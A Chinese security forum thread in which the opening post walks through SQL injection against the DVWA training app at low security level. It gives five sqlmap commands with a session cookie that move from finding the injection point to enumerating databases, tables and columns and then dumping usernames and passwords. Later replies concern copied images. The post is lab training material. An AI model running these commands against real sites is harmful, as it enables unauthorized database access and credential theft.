3 人签到
    搜索
    Hi~登录注册
    查看: 54|回复: 6
    收起左侧

    DVWA 之low级别sql注入

    [复制链接]

    4

    主题

    0

    精华

    51 小时

    在线时间

    密圈

    积分
    26
    发表于 5 天前 | 显示全部楼层 |阅读模式
    将Security level设为low,在左侧列表中选择“SQL Injection”,然后在右侧的“User ID”文本框中输入不同的数字就会显示相应的用户信息。

    我们首先需要判断这里所传输的参数是文本型还是数字型,分别输入3和1+2,观察它们显示的结果并不一致,因而就判断出参数类型是文本型

    接下来用sqlmap注入 ,比较简单,不过要抓包抓cookie,因为这个是登陆后的注入,不然报错重定向



    1   用sqlmap判断是否有注入点

    sqlmap -u "http://192.168.242.1/dvw/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie="security=low; PHPSESSID=svb0idqkd55tee4mbckj3ejht5"
    DVWA 之low级别sql注入


    表示有注入点

    2.  爆数据库名

    sqlmap -u "http://192.168.242.1/dvw/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie="security=low; PHPSESSID=svb0idqkd55tee4mbckj3ejht5" --dbs
    DVWA 之low级别sql注入

    3.  爆数据库的表

    sqlmap -u "http://192.168.242.1/dvw/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie="security=low; PHPSESSID=svb0idqkd55tee4mbckj3ejht5" --tables -D "dvwa"


    DVWA 之low级别sql注入


    4  爆数据库表的字段

    sqlmap -u "http://192.168.242.1/dvw/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie="security=low; PHPSESSID=svb0idqkd55tee4mbckj3ejht5" --columns -D "dvwa" -T "users"

    DVWA 之low级别sql注入


    5.爆账号密码

    sqlmap -u "http://192.168.242.1/dvw/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie="security=low; PHPSESSID=svb0idqkd55tee4mbckj3ejht5" --dump -D "dvwa" -T "users" -C "user,password"
    DVWA 之low级别sql注入




    上一篇:ms12-020复现-xp蓝屏
    下一篇:【CTF-PWN】pwn4-level0
    回复

    使用道具 举报

    46

    主题

    1

    精华

    9 小时

    在线时间

    金牌会员

    Rank: 6Rank: 6

    积分
    1089
    发表于 5 天前 | 显示全部楼层
    表哥,帖子直接从别人那里复制过来的.....
    连图片链接都不改的。
    回复 支持 反对

    使用道具 举报

    4

    主题

    0

    精华

    51 小时

    在线时间

    密圈

    积分
    26
     楼主| 发表于 5 天前 | 显示全部楼层
    死咣咣 发表于 2019-7-13 09:31 AM DVWA 之low级别sql注入
    表哥,帖子直接从别人那里复制过来的.....
    连图片链接都不改的。

    哦?这个吗https://www.cnblogs.com/lanyincao/p/11179134.html
    这个是我的博客
    来自安卓客户端来自安卓客户端
    回复 支持 反对

    使用道具 举报

    46

    主题

    1

    精华

    9 小时

    在线时间

    金牌会员

    Rank: 6Rank: 6

    积分
    1089
    发表于 5 天前 | 显示全部楼层
    lanyinhua 发表于 2019-7-13 10:44 AM
    哦?这个吗https://www.cnblogs.com/lanyincao/p/11179134.html
    这个是我的博客

    是的哇,我看图片因为防盗链加载不出来。
    来提醒表哥一下。
    回复 支持 反对

    使用道具 举报

    9

    主题

    0

    精华

    7 小时

    在线时间

    密圈

    积分
    8
    发表于 5 天前 | 显示全部楼层
    又发现新的大佬了
    回复 支持 反对

    使用道具 举报

    4

    主题

    0

    精华

    51 小时

    在线时间

    密圈

    积分
    26
     楼主| 发表于 5 天前 | 显示全部楼层
    死咣咣 发表于 2019-7-13 11:07 AM DVWA 之low级别sql注入
    是的哇,我看图片因为防盗链加载不出来。
    来提醒表哥一下。

    抱歉啊,我应该先发表在我们极安都,完了有这个防盗链,谢谢提醒啊,我下次记得了DVWA 之low级别sql注入
    来自安卓客户端来自安卓客户端
    回复 支持 反对

    使用道具 举报

    4

    主题

    0

    精华

    51 小时

    在线时间

    密圈

    积分
    26
     楼主| 发表于 5 天前 | 显示全部楼层
    陆工SU蒋 发表于 2019-7-13 11:10 AM DVWA 之low级别sql注入
    又发现新的大佬了

    没有啦,小白一名
    来自安卓客户端来自安卓客户端
    回复 支持 反对

    使用道具 举报

    游客
    回复
    您需要登录后才可以回帖 登录 | 获取账号

    快速回复 返回顶部 返回列表